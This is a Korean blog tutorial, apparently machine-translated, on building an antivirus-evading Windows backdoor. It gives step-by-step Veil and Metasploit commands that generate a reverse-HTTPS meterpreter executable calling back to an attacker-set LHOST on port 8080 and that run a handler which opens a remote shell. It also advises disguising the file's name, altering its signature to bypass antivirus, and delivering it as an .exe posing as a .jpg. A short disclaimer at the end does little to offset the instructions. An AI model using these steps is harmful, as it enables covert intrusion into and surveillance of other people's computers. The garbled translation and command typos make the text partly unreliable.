Windows용 탐지할 수 없는 백도어를 만드는 방법 — 윤리적 해킹

Mar 22 2022
백도어 란 무엇입니까? 백도어는 시스템의 일반 인증 및 방화벽을 우회하여 컴퓨터에 비밀리에 원격 액세스 권한을 얻는 방법입니다. 이 블로그에서는 안티바이러스도 감지하지 못하는 내 Windows 컴퓨터용 백도어를 어떻게 만들었는지에 대해 글을 쓸 것입니다.

백도어 란 무엇입니까?

백도어는 시스템의 일반 인증 및 방화벽을 우회하여 컴퓨터에 비밀리에 원격 액세스 권한을 얻는 방법입니다.

이 블로그에서는 안티바이러스도 감지하지 못하는 내 Windows 컴퓨터용 백도어를 어떻게 만들었는지에 대해 글을 쓸 것입니다. 백도어를 만든 후 Windows 시스템에서 웹캠 제어, 스크린샷 찍기, 키로거 사용 등과 같은 많은 작업을 원격으로 수행할 수 있었습니다. 시작하겠습니다.

내 .exe에 실행 파일(.exe 파일)을 만들었습니다 Ubuntu machine. 이 .exe파일은 Windows 시스템에서 실행될 때 Windows 시스템의 모든 것을 제어할 수 있는 Ubuntu 시스템에 대한 백도어를 생성했습니다.

따라야 할 단계를 살펴보겠습니다.

1. 베일 설치

첫 번째 단계로 Veil을 설치해야 합니다. Veil을 설치하려면 이 링크를 통해 이동할 수 있습니다.https://www.javatpoint.com/installing-veil. 또한 여기에서 다운로드할 수 있는 우분투 사용자를 위한 metasploitable-framework (Kali에는 필요하지 않음)를 설치해야 합니다.https://www.darkoperator.com/installing-metasploit-in-ubunt.

설치가 완료되면 를 입력하여 시작할 수 있습니다 veil. (또는 설치된 ./Veil.py디렉토리 를 입력하여 실행할 수 있습니다 .) veil베일 셸이 아래와 같이 열립니다.

2. 베일에서 회피 사용하기

베일 프레임워크 에는 베일 쉘에 list 를 입력하여 볼 수 있는 2개의 도구( Evasion및 )가 있습니다. 에 관심이 있으므로 다음을 입력합니다.OrdinanceEvasion

> use 1

      
                

백도어에서 역방향 연결 이 생성됩니다. 즉, 대상 사람이 스크립트를 두 번 클릭하면 컴퓨터가 백도어를 시작합니다. 따라서 연결을 요청하는 외부 시스템이 없기 때문에 많은 바이러스 백신 소프트웨어에서 감지할 수 없게 됩니다. 또한 8080웹 사이트에 연결하는 데 사용되는 공통 포트인 포트를 사용하므로 바이러스 백신 소프트웨어에 의심스러운 것이 없습니다.

유형 :

> list

      
                

> use 15

      
                

LHOST 및 LPORT를 설정하려면 다음을 실행하십시오.

> set LHOST <your_IP>
> set LPORT 8080

      
                

파일을 수정하고 바이러스 백신을 우회하도록 더 고유하게 만들어야 합니다. 내가 다음 2줄을 쓴 진짜 이유는 없습니다. 바이러스 백신을 우회하기 위해 서명을 약간 다르게 만드는 것입니다.

다음을 입력 generate하여 파일을 생성합니다. 백도어의 이름을 지정하라는 메시지가 나타납니다. 이름은 제가 지 backdoor_8080었지만 혹시라도 의심이 가지 않도록 조금 다르게 이름을 지어주셔도 좋습니다.

저장된 실행 파일의 위치를 ​​보여주는 페이지가 나타납니다.

축하 해요!!! 백도어가 생성됩니다. 다음 위치에 저장됩니다.var/lib/veil/output/compiled/backdoor_8080.exe

4. 포트에서 들어오는 연결 수신 대기

포트를 생성하는 동안 포트 8080을 사용했습니다. 따라서 대상 컴퓨터가 실행 파일을 실행할 때 연결할 준비가 되도록 우분투 컴퓨터에서 포트를 열 것입니다. 이를 위해 Metasploit 프레임워크를 사용합니다. Metasploit 콘솔을 실행하려면 다음을 실행하십시오.msfconsole

$ msfconsole

      
                

포트를 열려면 Metasploit에서 제공하는 모듈을 사용했습니다. 라고 multi/handler합니다. 그래서 나는 달리고,

> use exploit/multi/handler

      
                

요구 사항에 맞게 이러한 설정을 변경할 것입니다. 다음 명령을 실행합니다.

> set PAYLAOD windows/meterpreter/reverse_https
> set LHOST <IP>
> set LPORT 8080
> show options

exploit포트에서 수신을 시작하려면 입력 하세요.

> exploit

      
                

백도어를 대상 컴퓨터에 전달하는 다양한 사회 공학적 방법이 있습니다. 그러한 방법 중 하나는 트로이 목마를 만드는 방법을 작성한 아래 블로그에 설명되어 있습니다. .exe기본적으로 이미지 속의 파일을 파일로 위장한 것이다 .jpg.

6. Windows에서 백도어 테스트

Windows 시스템에서 파일을 두 번 클릭하면 backdoor_8080.exe내 실행 파일이 실행되었습니다.

우분투 머신에서 연결을 수신하고 있던 Metasploit에서 metepreter 셸이 열린 것을 볼 수 있습니다.

미터 프리터 셸은 위에 표시된 것과 같습니다. 입력 help하면 명령의 긴 목록과 수행할 수 있는 작업에 대한 설명을 얻을 수 있습니다.

실행할 수 있는 기본 명령 목록은 다음과 같습니다.

> sysinfo
> ipconfig
> pwd
> shell

지금까지 내 블로그가 마음에 들었다면 아래 버튼을 클릭하거나 다음 링크를 클릭하여 Buy Me A Coffee 를 얻을 수 있습니다.https://www.buymeacoffee.com/gouravdhar

백도어 요약

백도어를 생성하는 것은 잘못된 일이며 블랙햇 해커만 수행하는 것처럼 보이지만 완전히 사실은 아닙니다. 제품 기반 회사 중 일부는 사용자가 계정이나 제품에 액세스할 수 없는 경우 회사에서 액세스 권한을 얻을 수 있도록 제품에 백도어를 생성하기도 합니다. 위의 방법은 백도어를 생성하는 좋은 방법이지만 윤리적인 측면을 원하면 권한이 없는 컴퓨터에 액세스하는 데 이 방법을 사용하지 마십시오.

더 많은 흥미로운 주제에 대한 업데이트를 얻으려면 여기에서 나를 따르십시오 . 자유롭게 의견을 말하고 경험과 생각을 공유하십시오. 더 많은 기술 관련 블로그 를 보려면 https://gourav-dhar.com 에서 내 웹 사이트를 확인하는 것을 잊지 마십시오 .